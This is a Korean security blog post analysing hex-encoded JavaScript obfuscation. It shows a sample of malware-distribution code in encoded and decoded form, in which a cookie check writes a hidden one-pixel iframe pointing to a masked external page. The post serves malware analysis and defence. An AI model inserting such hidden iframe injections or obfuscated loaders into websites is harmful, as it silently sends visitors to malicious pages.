16진수 값을 이용하여 만드는 Hexdecimal Obfuscation입니다.
간단하게 아스키 코드표의 16진수 값을 따라 난독화를 풀 수 있고, Malzilla 또는 Jsdetox 등 이용해서 난독화를 해제 할 수 있습니다.
난독화
if (document.cookie.indexOf('veatpr') == -1) {
var expires = new Date();
expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000);
document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString();
document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F
%77%77%77%2E%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2E%63%6F%6D%2F%75%73%65
%72%2F%70%6F%70%2F%70%6F%70%5F%70%68%6F%74%6F%74%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D
%27%31%31%36%27%20%68%65%69%67%68%74%3D%27%31%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));
}
난독화 해제
if (document.cookie.indexOf('veatpr') == -1) {
var expires = new Date();
expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000);
document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString();
document.write(unescape("<iframe src='http://www.****************.com/user/pop/pop_photot.html' width='116' height='1' frameborder='0'>"));
}
* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.
반응형
'Information Security > Malware' 카테고리의 다른 글
| Kaixin Exploit Tookit(Yszz 0.13) (2) | 2013.06.13 |
|---|---|
| Gondad EK 최근 추세 (1) | 2013.06.12 |
| Split Obfuscated (0) | 2013.06.07 |
| JSMin Javascript Compressor (0) | 2013.06.07 |
| Decimal Obfuscated (0) | 2013.05.21 |
